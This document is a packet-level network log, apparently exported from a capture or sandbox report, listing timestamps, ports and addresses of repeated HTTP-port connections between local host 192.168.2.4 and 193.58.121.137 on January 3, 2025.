Jan 3, 2025 20:48:22.252413034 CET	80	49923	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:22.252547979 CET	80	49923	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:22.429534912 CET	80	49922	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:22.481775045 CET	49922	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:22.518940926 CET	80	49923	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:22.559992075 CET	49923	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:22.576776028 CET	80	49922	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:22.622411013 CET	49922	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:22.670315027 CET	80	49923	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:22.715370893 CET	49900	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:22.716393948 CET	49923	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:22.718025923 CET	49922	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:22.718349934 CET	49923	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:22.718734026 CET	49929	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:22.723067999 CET	80	49922	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:22.723120928 CET	49922	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:22.723572969 CET	80	49929	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:22.723618031 CET	80	49923	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:22.723642111 CET	49929	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:22.723665953 CET	49923	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:22.723807096 CET	49929	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:22.728590965 CET	80	49929	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:23.075786114 CET	49929	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:23.080657959 CET	80	49929	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:23.080676079 CET	80	49929	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:23.080684900 CET	80	49929	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:23.364413977 CET	80	49929	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:23.419303894 CET	49929	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:23.492283106 CET	80	49929	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:23.544279099 CET	49929	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:23.621954918 CET	49929	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:23.622315884 CET	49935	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:23.626851082 CET	80	49929	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:23.627074957 CET	49929	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:23.627139091 CET	80	49935	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:23.627213955 CET	49935	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:23.627346039 CET	49935	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:23.632198095 CET	80	49935	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:23.988461018 CET	49935	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:23.993361950 CET	80	49935	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:23.993375063 CET	80	49935	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:23.993382931 CET	80	49935	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:24.270412922 CET	80	49935	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:24.327125072 CET	49935	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:24.402657032 CET	80	49935	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:24.456770897 CET	49935	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:25.337538958 CET	49946	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:25.342489004 CET	80	49946	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:25.342602968 CET	49946	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:25.342700005 CET	49946	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:25.347544909 CET	80	49946	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:25.700766087 CET	49946	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:25.705868959 CET	80	49946	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:25.705883980 CET	80	49946	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:25.705904007 CET	80	49946	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:25.981708050 CET	80	49946	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:26.028678894 CET	49946	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:26.115055084 CET	80	49946	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:26.169361115 CET	49946	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:26.311662912 CET	49953	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:26.311752081 CET	49946	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:26.316590071 CET	80	49953	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:26.316828966 CET	80	49946	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:26.316906929 CET	49946	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:26.317024946 CET	49953	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:26.317024946 CET	49953	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:26.321901083 CET	80	49953	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:26.669524908 CET	49953	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:26.674382925 CET	80	49953	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:26.674483061 CET	80	49953	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:26.674491882 CET	80	49953	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:26.992120981 CET	80	49953	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:27.044352055 CET	49953	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:27.129170895 CET	80	49953	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:27.170515060 CET	49953	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:27.682946920 CET	49953	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:27.683476925 CET	49963	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:27.686769009 CET	49964	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:27.687968969 CET	80	49953	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:27.688023090 CET	49953	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:27.688270092 CET	80	49963	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:27.688329935 CET	49963	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:27.688441992 CET	49963	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:27.691576004 CET	80	49964	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:27.691656113 CET	49964	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:27.691878080 CET	49964	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:27.693161011 CET	80	49963	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:27.696665049 CET	80	49964	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:28.044507980 CET	49963	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:28.044543982 CET	49964	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:28.049540997 CET	80	49963	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:28.049557924 CET	80	49963	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:28.049568892 CET	80	49963	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:28.049623013 CET	80	49964	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:28.049633026 CET	80	49964	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:28.357605934 CET	80	49964	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:28.361604929 CET	80	49963	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:28.403731108 CET	49964	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:28.403734922 CET	49963	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:28.493041992 CET	80	49964	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:28.493614912 CET	49963	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:28.497051001 CET	80	49963	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:28.497107983 CET	49963	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:28.498749971 CET	80	49963	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:28.498819113 CET	49963	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:28.544326067 CET	49964	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:28.623961926 CET	49964	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:28.624561071 CET	49970	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:28.629031897 CET	80	49964	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:28.629089117 CET	49964	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:28.629431009 CET	80	49970	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:28.629498005 CET	49970	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:28.629640102 CET	49970	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:28.634421110 CET	80	49970	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:28.981982946 CET	49970	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:28.986888885 CET	80	49970	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:28.986903906 CET	80	49970	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:28.986916065 CET	80	49970	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:29.289935112 CET	80	49970	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:29.341300011 CET	49970	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:29.389369965 CET	80	49935	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:29.389458895 CET	49935	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:29.439449072 CET	80	49970	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:29.481842041 CET	49970	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:29.559849024 CET	49977	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:29.567429066 CET	80	49977	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:29.567507029 CET	49977	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:29.567708969 CET	49977	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:29.575195074 CET	80	49977	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:29.926165104 CET	49977	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:29.931024075 CET	80	49977	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:29.931035995 CET	80	49977	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:29.931045055 CET	80	49977	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:30.210920095 CET	80	49977	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:30.263113976 CET	49977	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:30.340120077 CET	80	49977	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:30.388226032 CET	49977	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:30.476313114 CET	49983	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:30.476494074 CET	49977	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:30.481240988 CET	80	49983	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:30.481426954 CET	49983	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:30.481563091 CET	80	49977	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:30.481616974 CET	49977	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:30.483438969 CET	49983	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:30.488289118 CET	80	49983	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:30.841780901 CET	49983	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:30.848558903 CET	80	49983	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:30.848571062 CET	80	49983	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:30.848618984 CET	80	49983	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:31.241086006 CET	80	49983	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:31.294363976 CET	49983	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:31.379453897 CET	80	49983	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:31.419404984 CET	49983	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:31.492583990 CET	49935	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:31.492681026 CET	49761	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:31.492733002 CET	49970	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:31.492800951 CET	49753	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:31.498573065 CET	49983	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:31.498795033 CET	49990	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:31.503667116 CET	80	49990	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:31.503746986 CET	49990	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:31.503809929 CET	80	49983	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:31.503844976 CET	49990	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:31.503870964 CET	49983	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:31.508588076 CET	80	49990	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:31.857456923 CET	49990	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:31.862418890 CET	80	49990	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:31.862443924 CET	80	49990	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:31.862462997 CET	80	49990	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:32.151712894 CET	80	49990	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:32.200685978 CET	49990	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:32.303177118 CET	80	49990	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:32.356925964 CET	49990	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:32.496447086 CET	49990	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:32.496676922 CET	49998	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:32.501594067 CET	80	49998	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:32.501607895 CET	80	49990	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:32.501672029 CET	49990	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:32.501682997 CET	49998	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:32.501857996 CET	49998	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:32.506747961 CET	80	49998	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:32.857111931 CET	49998	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:32.861995935 CET	80	49998	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:32.862009048 CET	80	49998	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:32.862020016 CET	80	49998	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:33.167386055 CET	80	49998	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:33.222142935 CET	49998	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:33.300152063 CET	80	49998	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:33.356853008 CET	49998	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:33.615858078 CET	49998	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:33.620898008 CET	80	49998	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:33.620979071 CET	49998	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:34.127530098 CET	50008	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:34.127631903 CET	50007	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:34.132534027 CET	80	50008	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:34.132549047 CET	80	50007	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:34.132661104 CET	50007	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:34.132677078 CET	50008	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:34.132802963 CET	50008	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:34.137599945 CET	80	50008	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:34.486675024 CET	50008	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:34.491607904 CET	80	50008	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:34.491622925 CET	80	50008	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:34.491635084 CET	80	50008	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:34.811043978 CET	80	50008	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:34.857311964 CET	50008	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:34.942147017 CET	80	50008	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:34.997514963 CET	50008	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:35.061774015 CET	50008	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:35.062069893 CET	50014	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:35.066819906 CET	80	50008	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:35.066869020 CET	80	50014	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:35.066907883 CET	50008	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:35.066961050 CET	50014	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:35.067047119 CET	50014	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:35.071867943 CET	80	50014	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:35.419471025 CET	50014	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:35.424410105 CET	80	50014	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:35.424422979 CET	80	50014	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:35.424432039 CET	80	50014	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:35.739481926 CET	80	50014	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:35.794374943 CET	50014	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:35.870773077 CET	80	50014	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:35.919388056 CET	50014	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:36.394788027 CET	50014	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:36.395073891 CET	50024	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:36.399909973 CET	80	50024	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:36.399980068 CET	80	50014	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:36.400069952 CET	50014	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:36.400080919 CET	50024	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:36.400163889 CET	50024	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:36.405000925 CET	80	50024	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:36.747652054 CET	50024	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:36.752470970 CET	80	50024	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:36.752541065 CET	80	50024	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:36.752549887 CET	80	50024	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:37.102171898 CET	80	50024	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:37.153789043 CET	50024	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:37.232892990 CET	80	50024	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:37.278796911 CET	50024	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:37.353396893 CET	50024	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:37.353693962 CET	50031	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:37.358454943 CET	80	50024	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:37.358467102 CET	80	50031	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:37.358536959 CET	50024	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:37.358577013 CET	50031	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:37.358730078 CET	50031	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:37.363503933 CET	80	50031	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:37.716480017 CET	50031	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:37.722414017 CET	80	50031	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:37.722425938 CET	80	50031	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:37.722434998 CET	80	50031	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:38.058448076 CET	80	50031	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:38.106889009 CET	50031	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:38.190577984 CET	80	50031	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:38.247648954 CET	50031	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:38.309748888 CET	50037	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:38.314708948 CET	80	50037	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:38.314799070 CET	50037	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:38.314965963 CET	50037	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:38.319742918 CET	80	50037	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:38.695087910 CET	50037	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:38.699986935 CET	80	50037	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:38.699999094 CET	80	50037	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:38.700006962 CET	80	50037	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:38.959419966 CET	80	50037	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:39.013281107 CET	50037	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:39.088438034 CET	80	50037	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:39.138210058 CET	50037	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:39.163467884 CET	50043	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:39.169859886 CET	80	50043	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:39.171973944 CET	50043	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:39.174160004 CET	50043	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:39.180254936 CET	80	50043	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:39.251305103 CET	50045	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:39.257148027 CET	80	50045	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:39.260077000 CET	50045	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:39.263926029 CET	50045	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:39.268743992 CET	80	50045	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:39.541240931 CET	50043	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:39.546053886 CET	80	50043	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:39.546144962 CET	80	50043	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:39.608553886 CET	50045	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:39.613464117 CET	80	50045	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:39.613475084 CET	80	50045	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:39.613482952 CET	80	50045	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:39.854091883 CET	80	50043	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:39.903789997 CET	50043	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:39.911752939 CET	80	50045	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:39.966284037 CET	50045	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:40.001188993 CET	80	50043	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:40.044414997 CET	50043	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:40.045159101 CET	80	50045	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:40.091306925 CET	50045	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:40.167630911 CET	50043	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:40.167702913 CET	50045	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:40.167973042 CET	50052	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:40.168031931 CET	50037	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:40.172692060 CET	80	50043	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:40.172771931 CET	80	50052	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:40.172830105 CET	50043	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:40.172869921 CET	50052	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:40.173005104 CET	50052	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:40.173178911 CET	80	50045	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:40.173226118 CET	80	50037	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:40.173230886 CET	50045	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:40.173278093 CET	50037	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:40.177815914 CET	80	50052	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:40.529149055 CET	50052	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:40.534039021 CET	80	50052	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:40.534050941 CET	80	50052	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:40.534055948 CET	80	50052	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:40.855581045 CET	80	50052	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:40.903803110 CET	50052	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:40.986073017 CET	80	50052	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:41.028815031 CET	50052	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:41.107470989 CET	50058	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:41.107522964 CET	50052	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:41.112315893 CET	80	50058	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:41.112601995 CET	80	50052	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:41.112689972 CET	50052	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:41.112837076 CET	50058	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:41.112837076 CET	50058	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:41.117626905 CET	80	50058	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:41.466485977 CET	50058	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:41.471353054 CET	80	50058	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:41.471366882 CET	80	50058	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:41.471378088 CET	80	50058	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:41.760885000 CET	80	50058	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:41.810056925 CET	50058	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:41.892513037 CET	80	50058	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:41.935061932 CET	50058	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:43.073803902 CET	80	50031	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:43.073857069 CET	50031	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:43.148528099 CET	50071	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:43.149547100 CET	50058	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:43.153342962 CET	80	50071	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:43.153407097 CET	50071	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:43.154392958 CET	50071	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:43.154552937 CET	80	50058	193.58.121.137	192.168.2.4
